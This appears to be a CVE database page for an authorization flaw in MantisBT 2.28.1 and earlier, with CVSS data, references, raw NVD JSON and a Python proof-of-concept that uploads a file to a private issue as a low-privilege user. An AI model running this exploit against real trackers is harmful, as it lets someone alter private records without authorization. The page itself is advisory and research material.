CVE-2026-34754

Description

Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow an authenticated user to upload attachments to private Issues they are not authorized to access. This issue has been fixed in version 2.28.2.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Mantis Bug Tracker <= 2.28.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://localhost/mantisbt/bug_file_add.php"
login_url = "http://localhost/mantisbt/login.php"
username = "low_priv_user"
password = "password"
target_bug_id = "100"  # ID of a private issue

session = requests.Session()

# Step 1: Authenticate to get a valid session
login_payload = {
    "username": username,
    "password": password,
    "return": "index.php"
}
print("[*] Attempting login...")
session.post(login_url, data=login_payload)

# Step 2: Upload attachment to private issue
# The vulnerability lies in the lack of access check for 'bug_id'
files = {
    'file': ('malicious_payload.txt', b'This is an unauthorized upload.', 'text/plain')
}
upload_data = {
    'bug_id': target_bug_id,
    'max_file_size': '5000000'
}

print(f"[*] Attempting to upload file to private issue {target_bug_id}...")
response = session.post(target_url, files=files, data=upload_data)

if response.status_code == 200 and "File uploaded successfully" in response.text:
    print("[+] Exploit successful! File uploaded to unauthorized private issue.")
else:
    print("[-] Exploit failed or issue already patched.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34754
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34754
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34754/
[4] VulDB https://vuldb.com/cve/CVE-2026-34754
[5] https://github.com/mantisbt/mantisbt/commit/b262b4d2835b81394d75356dead66e52a6275206
[6] https://github.com/mantisbt/mantisbt/security/advisories/GHSA-h4x5-gvx6-3rwc
[7] https://mantisbt.org/bugs/view.php?id=36976

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34754", "sourceIdentifier": "[email protected]", "published": "2026-05-20T00:16:34.857", "lastModified": "2026-05-20T14:06:33.993", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow an authenticated user to upload attachments to private Issues they are not authorized to access. This issue has been fixed in version 2.28.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/mantisbt/mantisbt/commit/b262b4d2835b81394d75356dead66e52a6275206", "source": "[email protected]"}, {"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-h4x5-gvx6-3rwc", "source": "[email protected]"}, {"url": "https://mantisbt.org/bugs/view.php?id=36976", "source": "[email protected]"}]}}